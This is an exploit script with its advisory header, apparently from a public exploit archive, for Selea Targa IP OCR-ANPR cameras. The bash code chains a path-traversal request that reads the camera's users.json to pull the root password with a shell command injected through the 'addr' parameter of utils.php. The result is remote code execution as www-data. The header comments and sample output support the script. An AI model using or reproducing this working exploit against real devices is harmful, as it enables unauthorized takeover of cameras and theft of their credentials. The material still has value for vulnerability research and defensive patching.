# Exploit Title: Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)# Date: 07.11.2020# Exploit Author: LiquidWorm# Vendor Homepage: https://www.selea.com#!/bin/bash## Selea Targa IP OCR-ANPR Camera Unauthenticated Remote Code Execution### Vendor: Selea s.r.l.# Product web page: https://www.selea.com# Affected version: Model: iZero#Targa 512#Targa 504#Targa Semplice#Targa 704 TKM#Targa 805#Targa 710 INOX#Targa 750#Targa 704 ILB# Firmware: BLD201113005214# BLD201106163745# BLD200304170901# BLD200304170514# BLD200303143345# BLD191118145435# BLD191021180140# BLD191021180140# CPS: 4.013(201105)#3.100(200225)#3.005(191206)#3.005(191112)## Summary: IP camera with optical character recognition (OCR) software for automatic# number plate recognition (ANPR) also equipped with ADR system that enables it to read# the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number# of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number# plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes# this camera suitable for all installation conditions. Its built-in OCR software works# as an automatic and independent system without the need of a computer, thus giving# autonomy to the device even in the event of an interruption in the connection between# the camera and the operations centre.## Desc: Selea suffers from an authenticated command injection vulnerability. This can be# exploited to inject and execute arbitrary shell commands as the www-data user through# the 'addr' and 'port' HTTP GET parameters in utils.php page. Chaining the unauthenticated# LFI issue an attacker can grab credentials, authenticate and execute system commands.## =====================================================================================# /mnt/app/scripts/address_check.sh:# ----------------------------------## 01: #!/bin/sh# 02: . /mnt/app/scripts/env.sh# 03: . /mnt/app/scripts/log.sh# 04:# 05: CMD="$1"# 06: ADDR="$2"# 07: PORT="$3"# 08:# 09: if [ "$CMD" == "ping" ]; then# 10: RESULT=$(/bin/ping -I eth0 -W 1 -q -c 1 "$ADDR" 2>&1 )# 11: elif [ "$CMD" == "port" ]; then# 12: log "/usr/bin/nc -w 1 -v -z $ADDR $PORT"# 13: RESULT=$(/usr/bin/nc -w 1 -v -z "$ADDR" "$PORT" 2>&1 )# 14: fi# 15:# 16: echo -e "$RESULT"## =====================================================================================## Tested on: GNU/Linux 3.10.53 (armv7l)#PHP/5.6.22#selea_httpd#HttpServer/0.1#SeleaCPSHttpServer/1.1### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# @zeroscience### Advisory ID: ZSL-2021-5620# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5620.php### 07.11.2020### PoC chained exploit (as admin):## solidsnake@metalgear:~/prive$ ./selea.sh 192.168.1.17 id# Password found: testingus# Using Authorization: YWRtaW46dGVzdGluZ3VzCg==# Using command: id# uid=33(www-data) gid=33(www-data) groups=33(www-data)##
IP=$1
CMD=$2
PWD=`curl -s http://${IP}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json |grep -oP 'root_pwd": "\K.*?(?=",)'`
echo 'Password found: '${PWD}
AUTH=$(echo admin:${PWD}| base64)
echo 'Using Authorization: '${AUTH}
echo 'Using command: '${CMD}
curl -s "http://${IP}/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\$(${CMD})&type=port&port=80"-H "Authorization: Basic ${AUTH}"|grep -oP '1.3.3.7\K.*?(?=")'
